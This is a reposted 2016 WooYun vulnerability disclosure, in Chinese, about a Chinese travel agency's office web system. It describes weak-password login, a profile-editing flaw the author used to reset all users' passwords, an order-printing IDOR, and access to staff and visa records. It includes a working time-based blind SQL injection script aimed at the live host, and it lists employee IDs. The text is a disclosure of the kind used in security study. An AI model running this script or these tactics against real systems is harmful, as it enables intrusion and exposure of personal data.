中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

admin
admin
admin
109383
文章
90
评论
2017年5月2日13:52:34评论343 views字数 225阅读0分45秒阅读模式
摘要

2016-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-24: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-182798

漏洞标题: 中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

相关厂商: 中国和平国旅

漏洞作者: 路人甲

提交时间: 2016-03-10 09:22

公开时间: 2016-04-24 09:22

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 18

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷

0人收藏

漏洞详情

披露状态:

2016-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

网址:http://office.hply.com/index.php

一、右侧登陆处可撞库。用弱口令123456获得两个账号。

二、编辑个人资料处存在越权。可获取全部登陆用户名,本来想着爬取全部用户名再进行撞库,发现这里面可直接编辑用户资料,修改密码!这里我在试验过程中本来是要修改admin一个用户资料的,但是发现修改了一个的所有用户资料和密码都变得跟admin一样了,但相关权限还是保持原来的。这里我将用户密码全部设置成了hello123。

三、编辑个人资料处存在SQL注入。这里用sqlmap跑的时候不知为什么跑不出来,自己用脚本跑出用户名为:,脚本附后。

四、“操作出团”的“打印订单”处存在越权。这里点击“操作出团”,查看相应团购订单时是不存在越权的,但是当点击打印时,再改变ID值就存在越权了。

五、泄露大量内部信息(含409名员工详细信息、33790签证信息)。结合第二步存在的漏洞,重置了所有用户密码为hello123,找到boss用户,进行登陆,可查看409名员工详细信息(含姓名、身份证号、手机号、婚姻情况、家庭住址、员工编号等),33790条签证信息(含姓名、出生日期、手机号、护照号等)。

部分员工号:

code 区域 
boss
 chfjr0045
 cfcgj0046
 csbsj0048
 gtxgl089
 chljq0049
 chjzs0050
 cwzx0051
 ctmjq0052
 cqsjq0053
 clxjq0054
 cqjjq0047
 cyyfq0055
 cspy0056
 chyjq0057
 crdhyt0058
 ctsjq0059
 cyyjq0060
 HPP-241-ZJ
 HPP-236
 HPP-205

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

中国和平国旅某处存在设计缺陷及SQL注入涉及大量内部信息

漏洞证明:

验证脚本:

code 区域 
#encodeing=utf-8
 import requests
 import sys
 
 reload(sys)
 sys.setdefaultencoding('utf-8')
 
 headers = {
     'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'ECM_ID=cae2aea666d92a1b2199913190638a845d89dfce; CNZZDATA4207530=cnzz_eid%3D2129055563-1457444942-null%26ntime%3D1457524204'
     }
 
 print "test..."
 
 user=""
 for i in range(1,17):
     for payload in range(32,128):
         print user
         aaa="--"
         d="if(ascii(substr(user(),%s,1))=%s,sleep(6),1)" % (i,payload)
         test = d + aaa
         #print test
         r=requests.get('http://office.hply.com/index.php?app=om&act=personal&id=156 and '+test,headers=headers)
         if r.elapsed.seconds>=6:
             payload=chr(payload)
             user += payload
             #print payload.strip()
             break
         else:
             pass
 print user

修复方案:

。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin